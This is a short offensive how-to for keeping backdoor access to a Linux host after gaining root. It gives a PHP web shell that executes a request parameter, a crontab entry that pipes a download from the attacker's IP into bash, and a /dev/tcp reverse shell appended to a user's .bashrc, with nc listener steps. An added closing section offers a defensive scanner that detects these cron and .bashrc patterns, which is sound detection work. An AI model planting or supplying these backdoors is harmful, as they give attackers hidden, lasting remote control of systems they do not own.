Injecting Backdoors
If you have root and want to set up a backdoor for later use.
PHP Backdoor
Create a file shell.php and place it under /var/www/html with the following contents:
------------------------------------------
<?php
if (isset($_REQUEST['cmd'])) {
echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>";
}
?>
------------------------------------------
Access it directly at http://ip/shell.php; the command to run is taken from the cmd request parameter.
Cronjob Backdoor
It is not hidden, but it is useful. First look at the current system crontab:
cat /etc/crontab
echo '* * * * * root curl http://<yourip>:8080/shell | bash' >> /etc/crontab
Now on Kali:
Make a file named 'shell' with the following contents:
------------------------------------------
#!/bin/bash
bash -i >& /dev/tcp/ip/port 0>&1
------------------------------------------
Then serve it with: python3 -m http.server 8080
and start a listener with: nc -nvlp <port>
.bashrc Backdoor
If the user uses bash as their login shell, the ".bashrc" file in their home directory is executed each time an interactive session is launched.
echo 'bash -i >& /dev/tcp/ip/port 0>&1' >> ~/.bashrc
One important thing is to always have your nc listener ready, as you don't know when the user will log on.
This attack is very sneaky, as nobody really thinks about checking their ".bashrc" file.
On the other hand, you can't know whether any of the users will actually log in to the system, so you might wait a long time.
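As an added defensive check (not part of the original page), the script below scans a crontab and a shell start-up file for the two persistence patterns described in the Cronjob and .bashrc sections: a cron entry that pipes a remote download into bash, and a /dev/tcp reverse shell appended to .bashrc. The sample files, the 203.0.113.x addresses and the port numbers are constructed; scan_host lists the real files a responder would check.

```shell
#!/bin/bash
# Added example, not from the original page: look for the cron and .bashrc
# persistence patterns described above. Sample data below is constructed.
# Matches a bash /dev/tcp reverse shell, or curl/wget piped straight into a
# shell. Tune for your environment; "| sha256sum" would also match as written.
SUSPICIOUS_REGEX='/dev/tcp/|(curl|wget)[^|]*[|][[:space:]]*(ba)?sh'

# scan_file FILE: print FILE:LINENO:LINE for every suspicious non-comment line.
# Returns 0 when the file is clean or unreadable, 1 when at least one line hit.
scan_file() {
    local file="$1" hits=0 lineno=0 line
    [ -r "$file" ] || return 0
    while IFS= read -r line || [ -n "$line" ]; do
        lineno=$((lineno + 1))
        case "$line" in \#*) continue ;; esac   # skip comment lines
        if printf '%s\n' "$line" | grep -Eq "$SUSPICIOUS_REGEX"; then
            printf '%s:%d:%s\n' "$file" "$lineno" "$line"
            hits=$((hits + 1))
        fi
    done < "$file"
    [ "$hits" -eq 0 ]
}

# count_hits FILE: number of suspicious lines in FILE (0 for a clean file).
count_hits() {
    scan_file "$1" | wc -l | tr -d ' '
}

# scan_host: the files a responder would check on a live Linux host (run as root).
scan_host() {
    local f rc=0
    for f in /etc/crontab /etc/cron.d/* /etc/anacrontab /var/spool/cron/crontabs/* \
             /root/.bashrc /root/.profile /home/*/.bashrc /home/*/.profile; do
        scan_file "$f" || rc=1
    done
    return "$rc"
}

# demo: constructed /etc/crontab and .bashrc containing the lines from the page.
demo() {
    local tmp; tmp=$(mktemp -d)
    printf '%s\n' '# /etc/crontab (constructed sample)' \
        '17 * * * * root cd / && run-parts --report /etc/cron.hourly' \
        '* * * * * root curl http://203.0.113.10:8080/shell | bash' > "$tmp/crontab"
    printf '%s\n' "alias ll='ls -alF'" \
        'bash -i >& /dev/tcp/203.0.113.10/4444 0>&1' > "$tmp/bashrc"
    scan_file "$tmp/crontab" || true; scan_file "$tmp/bashrc" || true
    rm -rf "$tmp"
}
demo
```

The demo prints the two planted lines with their file and line number; on a real host run scan_host as root and triage every hit.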